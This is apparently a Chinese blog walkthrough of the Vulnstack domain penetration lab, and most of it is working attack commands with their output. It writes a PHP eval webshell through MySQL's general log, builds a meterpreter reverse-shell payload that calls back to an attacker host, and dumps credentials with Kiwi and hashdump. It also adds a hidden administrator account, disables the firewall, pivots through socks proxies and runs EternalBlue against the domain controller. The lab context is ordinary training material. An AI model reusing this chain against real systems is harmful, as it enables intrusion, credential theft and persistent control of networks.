![](https://i-blog.csdnimg.cn/blog_migrate/03ed8b4926e1d0ed685ff3de2ae933f7.jpeg)
┌──(root💀kali)-[/]
└─# nmap -A 192.168.164.128
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-26 09:53 CST
Nmap scan report for 192.168.164.128
Host is up (0.00052s latency).
Not shown: 989 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.4.45)
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: GOD)
1025/tcp open msrpc Microsoft Windows RPC
1026/tcp open msrpc Microsoft Windows RPC
1027/tcp open msrpc Microsoft Windows RPC
1028/tcp open msrpc Microsoft Windows RPC
1029/tcp open msrpc Microsoft Windows RPC
1030/tcp open msrpc Microsoft Windows RPC
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:A7:C1:B2 (VMware)
Device type: general purpose|media device
Running: Microsoft Windows 2008|10|7|8.1, Microsoft embedded
OS CPE: cpe:/o:microsoft:windows_server_2008::sp2 cpe:/o:microsoft:windows_10 cpe:/h:microsoft:xbox_one cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows Server 2008 SP2, Microsoft Windows Server 2008 SP2 or Windows 10 or Xbox One, Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Network Distance: 1 hop
Service Info: Host: STU1; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -2h40m00s, deviation: 4h37m07s, median: 0s
|_nbstat: NetBIOS name: STU1, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:a7:c1:b2 (VMware)
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: stu1
| NetBIOS computer name: STU1\x00
| Domain name: god.org
| Forest name: god.org
| FQDN: stu1.god.org
|_ System time: 2021-07-26T09:55:13+08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-07-26T01:55:13
|_ start_date: 2021-07-26T01:43:45
TRACEROUTE
HOP RTT ADDRESS
1 0.51 ms 192.168.164.128
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 85.47 seconds
![Image](https://i-blog.csdnimg.cn/blog_migrate/2bd2b28d4a97275a1485858abd8d6fd1.png)
└─dirsearch -u http://192.168.164.128
![](https://i-blog.csdnimg.cn/blog_migrate/26cb72990970bc5ef29bb6f20b4d71a7.jpeg)
![](https://i-blog.csdnimg.cn/blog_migrate/9e12b724538265054394e3f33c237ab3.jpeg)
![](https://i-blog.csdnimg.cn/blog_migrate/ec359e23371a1315c4c5976975347c45.jpeg)
5. 本来想着找个python脚本爆破一下,可惜网上的大多用不了,手动猜出来了root:root,登陆进去之后就是通过phpmyadmin写入webshell了
我们这里用日志写入一句话的方式,首先进入phpmyadmin后台,查看genelog变量,更改general log和general log file参数,初始设置general log是OFF,我们将其改成ON;general log file改成网站的根目录,通过phpstudy指针已经知道了网站根目录
show global variables like '%general%';
![](https://i-blog.csdnimg.cn/blog_migrate/0a772e59755701a7959efb36e23d1223.jpeg)
set global general_log='on';
![](https://i-blog.csdnimg.cn/blog_migrate/8d73e9763eac9c77e37586a74fe3f871.jpeg)
set global general_log_file='C:/phpStudy/PHPTutorial/WWW/shell.php';
![](https://i-blog.csdnimg.cn/blog_migrate/f620a91d6631fe1a0dded9291e2e74b6.jpeg)
![](https://i-blog.csdnimg.cn/blog_migrate/1daca4febf0460753290b3b49d56338c.jpeg)
这边写入大马意识可以的:
select '<?php eval($_POST["shell"]);?>';
![](https://i-blog.csdnimg.cn/blog_migrate/d3567f0638df4acbe9a5c3eab3709956.jpeg)
![](https://i-blog.csdnimg.cn/blog_migrate/317eb217bfba85e5b47f33da325edb68.jpeg)
![](https://i-blog.csdnimg.cn/blog_migrate/f638ac6d47d8d3f145c801cee10ef547.jpeg)
7. 查看根目录之后发现了一个cms,我们在浏览器访问,自己安装的phpstudy打不开这个管理系统,把原来的phpstudy重启一下完美解决
不用扫目录之类的了,主页面已经给了出来信息直接用,进入后台并登录
![](https://i-blog.csdnimg.cn/blog_migrate/434e0c991ea93e149bece43e86da7eec.jpeg)
![](https://i-blog.csdnimg.cn/blog_migrate/6585864250b5f71b420469898c464aa0.jpeg)
![](https://i-blog.csdnimg.cn/blog_migrate/5a7322d25b05f5be64e8d19cb5d77107.jpeg)
![](https://i-blog.csdnimg.cn/blog_migrate/36a85a022194d44130716c64c3be6fdc.jpeg)
10. 看了一下教程,说是留言板有个xss的,我们也来试试
<script>alert('xss')</script>
![](https://i-blog.csdnimg.cn/blog_migrate/d4ee4336578f741740b49d65435a94ce.jpeg)
![](https://i-blog.csdnimg.cn/blog_migrate/76bc089a0f82fa2711cff1fed40b0337.jpeg)
msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.164.129 LPORT=1222 -f exe -o asd.exe
use exploit/mutli/handler
set payload windows/x64/meterpreter_reverse_tcp
set lhost 192.168.164.129
set lport 1222
![](https://i-blog.csdnimg.cn/blog_migrate/5008e9b5210959eda27a7c4ba4d61809.jpeg)
![](https://i-blog.csdnimg.cn/blog_migrate/c35d61d3748c732f106e7cf003aaad16.jpeg)
13. 加载Kiwl插件获取hash并解密
ps:
migrate PID(进程迁移)这边meterpreter是32位的,系统是64位的,所以得迁移进程
meterpreter > load Kiwi
meterpreter > creds_all
![](https://i-blog.csdnimg.cn/blog_migrate/de79a7b882ae39b79ec75e1a124c6d14.jpeg)
![](https://i-blog.csdnimg.cn/blog_migrate/a7e32386d9d1d8c7fe6b9df3c1feff91.jpeg)
net user test Admin123 /add # 添加账户密码
net localgroup administrators test /add # 给test账户添加为管理员权限
net user test # 查询是否成功添加test用户
run post/windows/manage/enable_rdp
![](https://i-blog.csdnimg.cn/blog_migrate/b03bacdeba5767dfc95636e171c21059.jpeg)
rdesktop 192.168.164.128:3389 kali的一个远程工具
![](https://i-blog.csdnimg.cn/blog_migrate/d21363a4f57cc9e5125b29d81aaafb3a.jpeg)
![](https://i-blog.csdnimg.cn/blog_migrate/37a958685096fc3f5503d3bc0e0bf99f.jpeg)
15. 开始横向移动,先自动创建路由
run post/multi/manage/autoroute
![](https://i-blog.csdnimg.cn/blog_migrate/599de192cea54b6f8f17715f50532bfa.jpeg)
![](https://i-blog.csdnimg.cn/blog_migrate/a901d8ca523c0b8dce1aa776cd44cf4e.jpeg)
![](https://i-blog.csdnimg.cn/blog_migrate/61df65681f38ebb597deeddcc82e9f6a.jpeg)
![](https://i-blog.csdnimg.cn/blog_migrate/e469d5c52e9c99394adef936a8c27f44.jpeg)
![](https://i-blog.csdnimg.cn/blog_migrate/ea665ca502600748d389bd88bbbd8eef.jpeg)
![](https://i-blog.csdnimg.cn/blog_migrate/6c53323abc58002e5ac4a4fa8588a480.jpeg)
proxychains nmap -sT -Pn 192.168.52.143
![](https://i-blog.csdnimg.cn/blog_migrate/ee07d5f31f15d5f84bd54d51ab86a53c.jpeg)
![](https://i-blog.csdnimg.cn/blog_migrate/027e956f1e4f0e60fa226a48a4b48546.jpeg)
use auxiliary/scanner/netbios/nbname
![](https://i-blog.csdnimg.cn/blog_migrate/7cfe3d6d68671e753adeb6d09a0cc5d0.jpeg)
22. 再用msf的端口扫描模块对发现的主机扫描,查看开放的端口,这边双管齐下,扫描的太慢了
use auxiliary/scanner/portscan/tcp
![](https://i-blog.csdnimg.cn/blog_migrate/c7adde7bd9547ff48522874c1074ff7f.jpeg)
use auxiliary/scanner/smb/smb_ms17_010
![](https://i-blog.csdnimg.cn/blog_migrate/042f8b72aa4080e3e0498475dbfcefb3.jpeg)
![](https://i-blog.csdnimg.cn/blog_migrate/d2f09b47dc4902f1e3f8da8487b6c21f.jpeg)
use auxiliary/admin/smb/ms17_010_command
![](https://i-blog.csdnimg.cn/blog_migrate/897ae65cad1ee003503d97cd92a7e6f7.jpeg)
net config workstation 查看是否有域,以及当前登录域
![](https://i-blog.csdnimg.cn/blog_migrate/fbabbce85c0f337e0cf14fe7b6fa7e48.jpeg)
C:\Windows\system32>chcp 65001
net view 查看域内主机列表
![](https://i-blog.csdnimg.cn/blog_migrate/c8dbff12bb5ccb92115f90d978973c71.jpeg)
![](https://i-blog.csdnimg.cn/blog_migrate/fa34b8e9432f71758d2ad42dce225e4f.jpeg)
![](https://i-blog.csdnimg.cn/blog_migrate/5f213b6cd7339c883164e8e322f3df3a.jpeg)
net user /domain 查看域内所有域用户
![](https://i-blog.csdnimg.cn/blog_migrate/ef23069618943a31ea33aa391c507092.jpeg)
net group "domain admins" /domain 查看域管理员列表
![](https://i-blog.csdnimg.cn/blog_migrate/6f01cac28cdacf202aed0779fda9c358.jpeg)
26. 完全可以用ms17_010command模块来执行命令,打开3389添加用户,登陆进去,其实在win7上就拿到了管理员用户名和密码,不过这是练习,我们就在继续骚操作
我们通过弹一个正向shell (因为msf 开了代理,所以不能弹反向shell),我们可以win7远程桌面,所给把马子传给win7然后开共享目录,下载到域控上面,然后执行
msfvenom -p windows/meterpreter/bind_tcp -f exe -o /home/dzj/s.exe
![](https://i-blog.csdnimg.cn/blog_migrate/3adb523fcf3016fdd8530f9641da7a15.jpeg)
use exploit/multi/handler
![](https://i-blog.csdnimg.cn/blog_migrate/9aa94e211e6eaeb6202b30519ad1f1fa.jpeg)
![](https://i-blog.csdnimg.cn/blog_migrate/c9b78275c64079cb6828ec91c3d04b61.jpeg)
![](https://i-blog.csdnimg.cn/blog_migrate/b7bc468f52ae6413c472c203c4b89df2.jpeg)
copy \\192.168.52.143\WWW\s.exe C:\s.exe
![](https://i-blog.csdnimg.cn/blog_migrate/ce37a340ccb7de29ac06dd9b0524bfbe.png)
![](https://i-blog.csdnimg.cn/blog_migrate/bd1685af2bc4dfeccd70df72bd04df6b.jpeg)
set command copy \\\\STU1\\WWW\\s2.exe C:\\s2.exe
![](https://i-blog.csdnimg.cn/blog_migrate/5c1e0fd7dfff4d80e75af242734b6a81.jpeg)
![Image](https://i-blog.csdnimg.cn/blog_migrate/f1108075cd39ae7bd76bf1a6bf5e97f5.png)
set payload windows/x64/meterpreter/bind_tcp
![Image](https://i-blog.csdnimg.cn/blog_migrate/6c497aee9855f5b6ee6ac257516b9fa5.png)
set payload windows/meterpreter/bind_tcp
![Image](https://i-blog.csdnimg.cn/blog_migrate/06a0af7901d9983cd72eb8633a455496.png)
exploit/windows/smb/ms17_010_eternalblue
![Image](https://i-blog.csdnimg.cn/blog_migrate/3c95b21c205b29441f9a5749d6014d95.png)
![Image](https://i-blog.csdnimg.cn/blog_migrate/0cbbd19789444b706e481a28f985fee9.png)
![Image](https://i-blog.csdnimg.cn/blog_migrate/0b3dc18c698a6370fc405df93a9a3a9a.png)
![Image](https://i-blog.csdnimg.cn/blog_migrate/d057e1606a731f352e8fe44e10a89528.png)
![Image](https://i-blog.csdnimg.cn/blog_migrate/86f0900f7acb8a2e4c3abb66bd749e8e.png)
这里还有一点对于非服务器版本的windows 远程登录的话,会断开该主机当前的连接,有可能会惊动管理员。这个时候不慌,可以使用rdpwrap。
rdpwrap是一款可以允许非服务器版本进行多个用户登录的patcher,从github上面下载下来,用蚁剑把 RDPWInst.exe 传上去,然后执行:
RDPWInst.exe -i -s
总结:
1.通过NMAP对目标网络段进行存活主机探测,通过排查发现目标主机128有可利用点
nmap -sp 192.168.164.0/24
2.对128主机进行端口探测,发现是该主机是域成员主机以及开放了80,445,3306端口
nmap -A 192.168.164.128
3.通过dirsearch对192.168.164.128的web应用进行URL目录扫描,发现存在phpmyadmin目录和l.php
4.访问1.php,发现网站的根目录为:C:/phpStudy/PHPTutorial/WWW/
5.访问phpmyadmin目录,是网站的数据库管理系统,这里通过尝试输入弱口令root/root即可登录系统
6.在sql语句中执行命令查看general变量,发现general log是OFF,并且发现general log file的根目录是C:/phpStudy/PHPTutorial/MYsql/
show global variables like '%general%';
7.将general log设置为on
set global general_log='on';
8.将 general log file设置为网站根目录
set global general_log_file='C:/phpStudy/PHPTutorial/WWW/shell.php';
9.通过log日志写入一句话
select '<?php eval($_POST["shell"]);?>';
10.通过蚁剑成功连接一句,并通过自带的命令功能查看下当前目标权限为admin权限
whomai
12.发现目标系统中的根目录下还有一个CMS目录,访问CMS目录,公告直接泄露了网站后台的用户名和密码,可成功登陆到系统后台
13.在后台模板处可直接上传php大马,大马名称为shell_1.php
14.通过robots.txt查看到泄露的目录,访问目录,可目录遍历到上传到大马的目录保存路径
http://192.168.164.128/yycms/protected/apps/default/view/default
15.可成功访问php大马
http://192.168.164.128/yycms/protected/apps/default/view/default/shell_1.php
16.在攻击机上执行MSF生成的后门
msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.164.129 LPORT=1222 -f exe -o asd.exe
17.通过蚁剑将asd.exe上传到目标系统中,并通过其命令功能执行
c:/>acd.exe
18.MSF进行监听,成功上线
use exploit/mutli/handler
set payload windows/x64/meterpreter_reverse_tcp
set lhost 192.168.164.129
set lport 1222
19.通过smart_hasdump模块获取目标的hash值,可成功获取到管理员的hash
meterpreter>run post /windows/gather/smart_hashdump
20.加载kiwi插件获取hash并解密
meterpreter > load Kiwi
meterpreter > creds_all
21.通过注册表开启3389端口,添加远程桌面用户,进入远程桌面
meterprter>shell
c:/>ipconfig //查看到目标系统存在两个网卡,一个网卡IP地址为192.168.164.128,另外一个网卡IP地址为192.168.52.143
c:/>net user test Admin123 /add # 添加账户密码
c:/>net localgroup administrators test /add # 给test账户添加为管理员权限
c:/>net user test # 查询是否成功添加test用户
rdesktop 192.168.164.128:3389 //kali下进行远程桌面
22.开始横向移动,先自动创建路由
meterprter>run post/multi/manage/autoroute
23.挂起会话,通过post/multi/manage/autoroute查看路由表
meterprter>background
msf>use post/multi/manage/autoroute
msf>set session 1
msf>route print
msf>run
24.使用auxiliary/server/socks_proxy这个模块开进行socks代理,设置好服务器ip和端口,运行后自动挂入后台
msf>use auxiliary/server/socks_proxy
msf>set srvhost 127.0.0.1
msf>run
25.修改/etc/proxychains.conf文件
sokcs5 127.0.0.1 1080
26.查看socks5端口
netstat -an |grep 1080
27. 这里使用msf自带的模块来扫描,发现了两台存活的主机(192.168.52.138与192.168.52.141)
use auxiliary/scanner/netbios/nbname
28.通过proxychains加载nmap进行扫描另一个网卡IP 192.168.52.141端口,发现也开放了80,335,3306,445端口
proxychains nmap -sT -Pn 192.168.52.141
29.再用msf的端口扫描模块对发现的主机扫描,查看开放的端口,发现192.168.52.138端口开放了21,445等端口
use auxiliary/scanner/portscan/tcp
30.都开了445端口经典ms17_010利用起来,先扫描发现有ms17_010的漏洞
use auxiliary/scanner/smb/smb_ms17_010
31. 使用ms17_010的command模块可以执行指令
use auxiliary/admin/smb/ms17_010_command
32.查看目标系统信息
msf>sessions -i 2
meterprter>shell
c:/>net config workstation //查看是否有域,查看当前域情况
c:>chcp 65001 //解决中文乱码
c:/>net view //查看当前域主机列表
c:/>net group "domain controllers" /domain //查看域控制器
c:/>ping owa 查看计算机名对应的IP地址
c:/>net user /domain 查看域内用户
c:/>net group "domain admins" /domain 查看域管理员列表
33.通过弹一个正向shell (因为msf 开了代理,所以不能弹反向shell),我们可以win7(192.168.52.143)远程桌面,所给把马子传给win7然后开共享目录,下载到域控上面,然后执行
msfvenom -p windows/meterpreter/bind_tcp -f exe -o /home/dzj/s.exe
34.MSF进行监听
use exploit/multi/handler
set payload windows/meterprter/bind_tcp
set lhost 192.168.164.129
set lport 3333
run
35.远程桌面上win7(192.168.52.143)开启共享
36.在域控主机上下载s.exe
copy \\192.168.52.143\WWW\s.exe C:\s.exe //发现下载不了,估计是win7防火墙开了
37.查看放防火墙状态:
netsh advfirewall show allprofile state
38.关闭所有防火墙:
netsh advfirewall set allprofiles state off
39.再试试下载文件,不能下载,我们用其他方法
set command copy \\\\STU1\\WWW\\s2.exe C:\\s2.exe
下载地址:
http://vulnstack.qiyuanxuetang.net/vuln/detail/2/